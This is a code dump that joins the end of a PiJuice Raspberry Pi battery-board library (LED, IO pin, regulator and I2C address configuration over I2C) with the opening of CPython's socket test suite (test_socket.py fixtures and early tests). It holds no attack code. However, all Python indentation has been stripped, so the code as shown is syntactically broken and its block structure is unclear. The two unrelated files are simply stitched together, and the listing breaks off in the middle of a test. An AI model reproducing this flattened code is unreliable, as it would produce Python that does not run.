data[i*2] = 0
data[i*2+1] = (int(config[self.buttonEvents[i]]['parameter']) // 100) & 0xff
return self.interface.WriteDataVerify(self.BUTTON_CONFIGURATION_CMD + b, data, 0.4)
leds = ['D1', 'D2']
# XXX: Avoid setting ON_OFF_STATUS
ledFunctionsOptions = ['NOT_USED', 'CHARGE_STATUS', 'USER_LED']
ledFunctions = ['NOT_USED', 'CHARGE_STATUS', 'ON_OFF_STATUS', 'USER_LED']
def GetLedConfiguration(self, led):
i = None
try:
i = self.leds.index(led)
except ValueError:
return {'error': 'BAD_ARGUMENT'}
ret = self.interface.ReadData(self.LED_CONFIGURATION_CMD + i, 4)
if ret['error'] != 'NO_ERROR':
return ret
else:
config = {}
try:
config['function'] = self.ledFunctions[ret['data'][0]]
except:
return {'error': 'UNKNOWN_CONFIG'}
config['parameter'] = {
'r': ret['data'][1],
'g': ret['data'][2],
'b': ret['data'][3]
}
return {'data': config, 'error': 'NO_ERROR'}
def SetLedConfiguration(self, led, config):
i = None
d = [0x00, 0x00, 0x00, 0x00]
try:
i = self.leds.index(led)
d[0] = self.ledFunctions.index(config['function'])
d[1] = int(config['parameter']['r'])
d[2] = int(config['parameter']['g'])
d[3] = int(config['parameter']['b'])
except ValueError:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteDataVerify(self.LED_CONFIGURATION_CMD + i, d, 0.2)
powerRegulatorModes = ['POWER_SOURCE_DETECTION', 'LDO', 'DCDC']
def GetPowerRegulatorMode(self):
result = self.interface.ReadData(self.POWER_REGULATOR_CONFIG_CMD, 1)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
if d[0] < len(self.powerRegulatorModes):
return {'data': self.powerRegulatorModes[d[0]], 'error': 'NO_ERROR'}
else:
return {'error': 'UNKNOWN_DATA'}
def SetPowerRegulatorMode(self, mode):
try:
ind = self.powerRegulatorModes.index(mode)
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteDataVerify(self.POWER_REGULATOR_CONFIG_CMD, [ind])
runPinConfigs = ['NOT_INSTALLED', 'INSTALLED']
def GetRunPinConfig(self):
result = self.interface.ReadData(self.RUN_PIN_CONFIG_CMD, 1)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
if d[0] < len(self.runPinConfigs):
return {'data': self.runPinConfigs[d[0]], 'error': 'NO_ERROR'}
else:
return {'error': 'UNKNOWN_DATA'}
def SetRunPinConfig(self, config):
try:
ind = self.runPinConfigs.index(config)
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteDataVerify(self.RUN_PIN_CONFIG_CMD, [ind])
ioModes = ['NOT_USED', 'ANALOG_IN', 'DIGITAL_IN', 'DIGITAL_OUT_PUSHPULL',
'DIGITAL_IO_OPEN_DRAIN', 'PWM_OUT_PUSHPULL', 'PWM_OUT_OPEN_DRAIN']
ioSupportedModes = {
1: ['NOT_USED', 'ANALOG_IN', 'DIGITAL_IN', 'DIGITAL_OUT_PUSHPULL',
'DIGITAL_IO_OPEN_DRAIN', 'PWM_OUT_PUSHPULL', 'PWM_OUT_OPEN_DRAIN'],
2: ['NOT_USED', 'DIGITAL_IN', 'DIGITAL_OUT_PUSHPULL',
'DIGITAL_IO_OPEN_DRAIN', 'PWM_OUT_PUSHPULL', 'PWM_OUT_OPEN_DRAIN']
}
ioPullOptions = ['NOPULL', 'PULLDOWN', 'PULLUP']
ioConfigParams = {
'DIGITAL_IN': [{'name': 'wakeup', 'type': 'enum', 'options':['NO_WAKEUP', 'FALLING_EDGE', 'RISING_EDGE']}],
'DIGITAL_OUT_PUSHPULL': [{'name': 'value', 'type': 'int', 'min': 0, 'max': 1}],
'DIGITAL_IO_OPEN_DRAIN': [{'name': 'value', 'type': 'int', 'min': 0, 'max': 1}],
'PWM_OUT_PUSHPULL': [{'name': 'period', 'unit': 'us', 'type': 'int', 'min': 2, 'max': 65536 * 2},
{'name': 'duty_cycle', 'unit': '%', 'type': 'float', 'min': 0, 'max': 100}],
'PWM_OUT_OPEN_DRAIN': [{'name': 'period', 'unit': 'us', 'type': 'int', 'min': 2, 'max': 65536 * 2},
{'name': 'duty_cycle', 'unit': '%', 'type': 'float', 'min': 0, 'max': 100}]
}
def SetIoConfiguration(self, io_pin, config, non_volatile=False):
d = [0x00, 0x00, 0x00, 0x00, 0x00]
try:
mode = self.ioModes.index(config['mode'])
pull = self.ioPullOptions.index(config['pull'])
nv = 0x80 if non_volatile == True else 0x00
d[0] = (mode & 0x0F) | ((pull & 0x03) << 4) | nv
if config['mode'] == 'DIGITAL_IN':
wup = config['wakeup'] if config['wakeup'] else 'NO_WAKEUP'
d[1] = self.ioConfigParams['DIGITAL_IN'][0]['options'].index(wup) & 0x03
elif config['mode'] == 'DIGITAL_OUT_PUSHPULL' or config['mode'] == 'DIGITAL_IO_OPEN_DRAIN':
d[1] = int(config['value']) & 0x01 # output value
elif config['mode'] == 'PWM_OUT_PUSHPULL' or config['mode'] == 'PWM_OUT_OPEN_DRAIN':
p = int(config['period'])
if p >= 2:
p = p // 2 - 1
else:
return {'error': 'INVALID_PERIOD'}
d[1] = p & 0xFF
d[2] = (p >> 8) & 0xFF
d[3] = 0xFF
d[4] = 0xFF
dc = float(config['duty_cycle'])
if dc < 0 or dc > 100:
return {'error': 'INVALID_CONFIG'}
elif dc < 100:
dci = int(dc*65534//100)
d[3] = dci & 0xFF
d[4] = (dci >> 8) & 0xFF
except:
return {'error': 'INVALID_CONFIG'}
return self.interface.WriteDataVerify(self.IO_CONFIGURATION_CMD + (io_pin-1)*5, d, 0.2)
def GetIoConfiguration(self, io_pin):
ret = self.interface.ReadData(self.IO_CONFIGURATION_CMD + (io_pin-1)*5, 5)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
nv = bool(d[0] & 0x80)
mode = self.ioModes[d[0] & 0x0F] if ((d[0] & 0x0F) < len(self.ioModes)) else 'UNKNOWN'
pull = self.ioPullOptions[(d[0] >> 4) & 0x03] if (((d[0] >> 4) & 0x03) < len(self.ioPullOptions)) else 'UNKNOWN'
if mode == 'DIGITAL_OUT_PUSHPULL' or mode == 'DIGITAL_IO_OPEN_DRAIN':
return {'data': {'mode': mode, 'pull': pull, 'value': int(d[1])},
'non_volatile': nv, 'error': 'NO_ERROR'}
elif mode == 'PWM_OUT_PUSHPULL' or mode == 'PWM_OUT_OPEN_DRAIN':
per = ((d[1] | (d[2] << 8)) + 1) * 2
dci = d[3] | (d[4] << 8)
dc = float(dci) * 100 // 65534 if dci < 65535 else 100
return {'data': {'mode': mode, 'pull': pull, 'period': per, 'duty_cycle': dc},
'non_volatile': nv, 'error': 'NO_ERROR'}
else:
wup = self.ioConfigParams['DIGITAL_IN'][0]['options'][d[1]&0x03] if d[1]&0x03 < len(self.ioConfigParams['DIGITAL_IN'][0]['options']) else ''
return {'data': {'mode': mode, 'pull': pull, 'wakeup': wup},
'non_volatile': nv, 'error': 'NO_ERROR'}
def GetAddress(self, slave):
if slave != 1 and slave != 2:
return {'error': 'BAD_ARGUMENT'}
result = self.interface.ReadData(self.I2C_ADDRESS_CMD + slave - 1, 1)
if result['error'] != 'NO_ERROR':
return result
else:
return {'data': format(result['data'][0], 'x'), 'error': 'NO_ERROR'}
def SetAddress(self, slave, hexAddress):
adr = None
try:
adr = int(str(hexAddress), 16)
except:
return {'error': 'BAD_ARGUMENT'}
if (slave != 1 and slave != 2) or adr < 0 or adr > 0x7F:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteData(self.I2C_ADDRESS_CMD + slave - 1, [adr])
def GetIdEepromWriteProtect(self):
ret = self.interface.ReadData(self.ID_EEPROM_WRITE_PROTECT_CTRL_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
else:
status = True if ret['data'][0] == 1 else False
return {'data': status, 'error': 'NO_ERROR'}
def SetIdEepromWriteProtect(self, status):
d = None
if status == True:
d = 1
elif status == False:
d = 0
else:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteDataVerify(self.ID_EEPROM_WRITE_PROTECT_CTRL_CMD, [d])
idEepromAddresses = ['50', '52']
def GetIdEepromAddress(self):
ret = self.interface.ReadData(self.ID_EEPROM_ADDRESS_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
else:
return {'data': format(ret['data'][0], 'x'), 'error': 'NO_ERROR'}
def SetIdEepromAddress(self, hexAddress):
if str(hexAddress) in self.idEepromAddresses:
adr = int(str(hexAddress), 16)
else:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteDataVerify(self.ID_EEPROM_ADDRESS_CMD, [adr])
def SetDefaultConfiguration(self):
return self.interface.WriteData(self.RESET_TO_DEFAULT_CMD, [0xaa, 0x55, 0x0a, 0xa3])
def GetFirmwareVersion(self):
ret = self.interface.ReadData(self.FIRMWARE_VERSION_CMD, 2)
if ret['error'] != 'NO_ERROR':
return ret
else:
major_version = ret['data'][0] >> 4
minor_version = (ret['data'][0] << 4 & 0xf0) >> 4
version_str = '%i.%i' % (major_version, minor_version)
return {'data': {
'version': version_str,
'variant': format(ret['data'][1], 'x')},
'error': 'NO_ERROR'}
def RunTestCalibration(self):
self.interface.WriteData(248, [0x55, 0x26, 0xa0, 0x2b])
# Create an interface object for accessing PiJuice features via I2C bus.
class PiJuice(object):
def __init__(self, bus=1, address=0x14):
self.interface = PiJuiceInterface(bus, address)
self.status = PiJuiceStatus(self.interface)
self.config = PiJuiceConfig(self.interface)
self.power = PiJuicePower(self.interface)
self.rtcAlarm = PiJuiceRtcAlarm(self.interface)
def __enter__(self):
# Just return this object so it can be used in a with statement
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False # Don't suppress exceptions.
def get_versions():
import os
try:
p = PiJuice()
firmware_version_dict = p.config.GetFirmwareVersion()
except:
firmware_version_dict = {}
uname = os.uname()
os_version = ' '.join((uname[0], uname[2], uname[3]))
firmware_version = firmware_version_dict.get('data', {}).get('version')
return __version__, firmware_version, os_version
if __name__ == '__main__':
if sys.argv[1] == '--version':
sw_version, fw_version, os_version = get_versions()
print("Software version: %s" % sw_version)
if fw_version is None:
fw_version = "No connection to PiJuice"
print("Firmware version: %s" % fw_version)
print("OS version: %s" % os_version)
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
